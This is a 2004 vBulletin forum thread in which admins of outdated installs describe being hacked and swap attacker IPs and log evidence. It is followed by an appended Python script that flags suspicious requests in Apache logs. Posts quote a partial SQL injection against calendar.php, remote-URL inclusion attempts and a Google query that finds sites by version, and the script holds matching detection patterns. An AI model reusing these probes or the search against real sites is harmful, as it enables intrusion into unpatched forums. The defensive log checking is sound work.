Hacked :-(

  • tox
    New Member
    • Jun 2004
    • 10
    • 2.2.8

    Hacked :-(

    Oh well, I guess I should have upgraded my outdated 2.2.8 ages ago.

    He created a new user account, didn't need to confirm the email address and then managed to upgrade his account to Admin.

    First he came from this IP: 212.100.251.149
    Then he switched to 67.72.98.57

    His email is [email protected]

    He's deleted all my forums and hence all messages :-(

    Then he left me with a big FU :
    britishspanking.com is your first and best source for all of the information you’re looking for. From general topics to more of what you would expect to find here, britishspanking.com has it all. We hope you find what you are searching for!


    My advice to all you people still running 2.2.8 : UPGRADE !!
    and ban these IPs from your servers...

    >>> MODS : Please don't delete the IPs from this message - had I seen a post like this before I would have banned these IPs immediately and been enjoying a nice beer now whilst watching the tennis at Wimbledon...

    tox.
    Last edited by tox; Sun 27 Jun '04, 4:57am.
  • GamerzWorld
    Senior Member
    • Sep 2003
    • 214
    • 3.5.x

    #2
    I got hacked a few months ago. Not nice.

    Comment

    • Scott MacVicar
      Former vBulletin Developer
      • Dec 2000
      • 13286

      #3
      Can you see how he's achieved it via apache access logs?

      I'd like to get a hold of yours for the past 12 hours prior to the hacking to see how he got in as there isn't a way that we know of that can simply give yourself admin permission.
      Scott MacVicar

      My Blog | Twitter

      Comment

      • tox
        New Member
        • Jun 2004
        • 10
        • 2.2.8

        #4
        I've PM'ed you a log file.
        Last edited by tox; Sun 27 Jun '04, 5:35am.

        Comment

        • Scott MacVicar
          Former vBulletin Developer
          • Dec 2000
          • 13286

          #5
          Scott MacVicar

          My Blog | Twitter

          Comment

          • pablo
            Senior Member
            • Apr 2002
            • 592
            • 3.8.x

            #6
            Today I've been getting a few weird requests like: showthread.php?t=http://www.b00gle.com/s/2&page=http://www.b00gle.com/s/2

            I've banned the IP that owns it: 213.239.194.75
            My Sites :

            Comment

            • LCD_Angel
              Member
              • Nov 2001
              • 95
              • 3.0.1

              #7
              OMG.... Noooo Way! That is the same first 9 digits of the IP address of the guy who hacked my forum. He deleted like 1,000,000 posts and guess what (backups didn't work!)

              I have contacted the webhost that this IP resolves to and they informed me that this was the second report of hacking from that IP and provided me with contact information (including phone number) for the customer who owns that IP! Please e-mail me at [email protected]

              We are filing a report with the FBI on the matter.

              He called himself [email protected] when he hacked me.... and his message also included Arabic text.

              Originally posted by tox

              First he came from this IP: 212.100.251.149
              Then he switched to 67.72.98.57

              His email is [email protected]

              Comment

              • Sasq
                New Member
                • Mar 2002
                • 1

                #8
                He got us as well over at murc. I've managed to recover the database; he killed the forum titles, but the posts and threads were still there.

                Running 2.2.9. I'll forward the logs if you want as soon as they are available.

                to recover the forums, you need to do a little bit of hard work in phpmyadmin.

                Comment

                • LCD_Angel
                  Member
                  • Nov 2001
                  • 95
                  • 3.0.1

                  #9
                  So you're telling me that the posts might still have been there?

                  I upgraded to Vb 3 after the "incident" having figured that all was lost. So.... those posts might still be around? Cause if they are I would be willing to pay to have them recovered. I know little to nothing about php and mysql really. I'd be willing to pay you to help me out if you think it can be recovered ($100).

                  Come to think of it... I bet those posts are still there because the backup files are still over 400 mb.

                  Comment

                  • Scott MacVicar
                    Former vBulletin Developer
                    • Dec 2000
                    • 13286

                    #10
                    Basically someone has gone and looked through Google for older versions of vBulletin and is picking on those who have neglected to upgrade.

                    It has come to our attention that there has been an attack on a number of vBulletin installations that are running older versions of the software. They are taking advantage of a known security flaw that was fixed in subsequent versions. It is extremely important that you keep your software up-to-date in order to protect
                    Scott MacVicar

                    My Blog | Twitter

                    Comment

                    • LCD_Angel
                      Member
                      • Nov 2001
                      • 95
                      • 3.0.1

                      #11
                      Originally posted by Scott MacVicar
                      Basically someone has gone and looked through Google for older versions of vBulletin and is picking on those who have neglected to upgrade.

                      http://www.vbulletin.com/forum/showthread.php?t=108741
                      Do you offer a service that would check to see if I still have all the old posts and then restore them?

                      Comment

                      • VOM
                        New Member
                        • Jun 2004
                        • 6

                        #12
                        Originally posted by Scott MacVicar
                        Basically someone has gone and looked through Google for older versions of vBulletin and is picking on those who have neglected to upgrade.

                        http://www.vbulletin.com/forum/showthread.php?t=108741
                        It was late last night here in the US when I got your warning message about the hacking trend. I was in two minds whether to go to bed or do the update. I figured what's the likelihood that they'll get my forum (I was running vB 2.2.9). Surely not! But, curiosity got the better of me and I decided to do the upgrade to 2.3.5 there and then (I had been putting off upgrading for several months and almost let my vB lease expire). Today, coincidentally at the very moment I was maintaining our forum web server I witnessed someone trying to mess with my forums by issuing the following command:
                        myforumaddress/forums/calendar.php?action=edit&%20eventid=14%20union%20select%20userid,username,emai...

                        This is apparently a SQL injection attack (according to BlackICE, which picked up the intrusion attempt).

                        IP address used was 82.129.217.130

                        A WhoIs traces back to a small subnet in Sohag, Egypt with a contact with a Hotmail address.

                        The referral to the forum web server came from a Google search. Presumably our forums are somewhere in Google as running with an older vB version.

                        Here is a chunk of the Google search expression that was used:
                        http://www.google.com/search?q=powered+by:+vbulletin+version+2.2.9&hl=en&lr=&ie=UTF-8&start=100&sa=N

                        This search yields 121,000 results. We are way, way down the list on page 10. Many of the entries in the list, including the one before us, show that they've already been hacked!

                        Here is what a hacked vB site looks like: http://boozet.xepher.net/vbulletin/

                        Presumably that is the hack attack type that you've been referring to, yes?
                        It seems to have been unsuccessful. So, it looks like I narrowly averted being hacked! Thanks for the warning!

                        So, fair warning to anyone that is putting off doing the upgrade, or that thinks it won't happen to them, do the upgrade and do it right now!
                        Last edited by VOM; Mon 28 Jun '04, 2:28pm.

                        Comment

                        • NjEcTiOn
                          Senior Member
                          • Dec 2001
                          • 133

                          #13
                          My website was also hacked. It is still saying that I have something like 62,999 posts in my database though. They are not showing up on my home page. Is there anyway to restore access to these posts?

                          Comment

                          • Scott MacVicar
                            Former vBulletin Developer
                            • Dec 2000
                            • 13286

                            #14
                            You'd need to check if the forum and thread tables are still intact, else you'll have to restore them from a backup.
                            Scott MacVicar

                            My Blog | Twitter

                            Comment

                            • kippesp
                              Senior Member
                              • Jan 2002
                              • 241

                              #15
                              Originally posted by tox
                              First he came from this IP: 212.100.251.149
                              Then he switched to 67.72.98.57
                              Monday I banned 212.100.251.149 from our server (since I read this post) and was surprised to find a hit every day since. Then I searched through past logs. I ended up unbanning the IP because I saw nothing but normal activity.

                              This is the second IP I've found where others have reported seeing exploit attempts in the web logs and I see nothing but normal activity. Any ideas? I don't know what the odds of a spoofed IP are, but I'd think it would be rather small.
                              Cygwin - all the tools to make Windows complete (cvs, vim, diff, grep, gcc, ssh, ...)

                              Comment
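Added here as a defender-side example, not code from anyone in the thread: the request shapes quoted above (a `union select` smuggled into calendar.php's eventid parameter in #12, and URLs where showthread.php's numeric t and page parameters belong in #6) plus the version-targeting Google referer from #12, turned into checks run over constructed Apache access-log lines and grouped per client IP, which is the check kippesp describes doing before deciding whether a reported IP has actually done anything on your own server. The sample log lines and addresses are constructed, and the set of integer-only parameters is an assumption about vBulletin 2.x, not taken from the thread.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache "combined" LogFormat: client, identity, user, time, request, status, bytes, referer, agent.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Assumption: these vBulletin 2.x query parameters only ever carry integer ids,
# so a URL or SQL fragment in one of them is never a legitimate request.
INT_PARAMS = {"t", "page", "eventid", "forumid", "threadid", "postid", "userid"}
SQLI_RE = re.compile(r"\bunion\b.*\bselect\b", re.I | re.S)
# Search referers of this shape locate installs by the version string in the page footer.
DORK_RE = re.compile(r"powered.by.*vbulletin.*version", re.I)

# Constructed sample traffic (RFC 5737 test addresses), shaped like the requests in the thread.
SAMPLE_LOG = """\
192.0.2.10 - - [28/Jun/2004:14:02:11 +0000] "GET /forums/showthread.php?t=1234&page=2 HTTP/1.1" 200 8812 "-" "Mozilla/4.0"
198.51.100.7 - - [28/Jun/2004:14:02:15 +0000] "GET /forums/calendar.php?action=edit&%20eventid=14%20union%20select%201,2,3 HTTP/1.1" 200 5120 "http://www.google.com/search?q=powered+by:+vbulletin+version+2.2.9&hl=en" "Mozilla/4.0"
198.51.100.8 - - [28/Jun/2004:14:03:40 +0000] "GET /forums/showthread.php?t=http://www.b00gle.com/s/2&page=http://www.b00gle.com/s/2 HTTP/1.1" 200 3300 "-" "Mozilla/4.0"
192.0.2.10 - - [28/Jun/2004:14:04:02 +0000] "GET /forums/index.php HTTP/1.1" 200 9001 "-" "Mozilla/4.0"
"""

def parse_line(line):
    """Return the named fields of one combined-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def classify(entry):
    """List the reasons a parsed request looks like an exploit attempt (empty if none)."""
    reasons = []
    query = unquote(urlsplit(entry["path"]).query)  # decode %20 etc. before pattern matching
    if SQLI_RE.search(query):
        reasons.append("sql-keywords-in-query")
    for key, value in parse_qsl(query, keep_blank_values=True):
        if key.strip() in INT_PARAMS and not value.strip().isdigit():
            reasons.append("non-numeric-id:" + key.strip())
    if DORK_RE.search(unquote(entry["referer"])):
        reasons.append("version-dork-referer")
    return reasons

def suspicious_by_ip(log_text):
    """Group flagged requests by client IP so a ban decision rests on your own evidence."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry and (reasons := classify(entry)):
            hits[entry["ip"]].append((entry["path"], reasons))
    return dict(hits)
```

Running `suspicious_by_ip(SAMPLE_LOG)` flags only the two probing addresses; the address that fetched ordinary pages comes back clean, which is the outcome kippesp saw when he checked his own logs for a reported IP.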
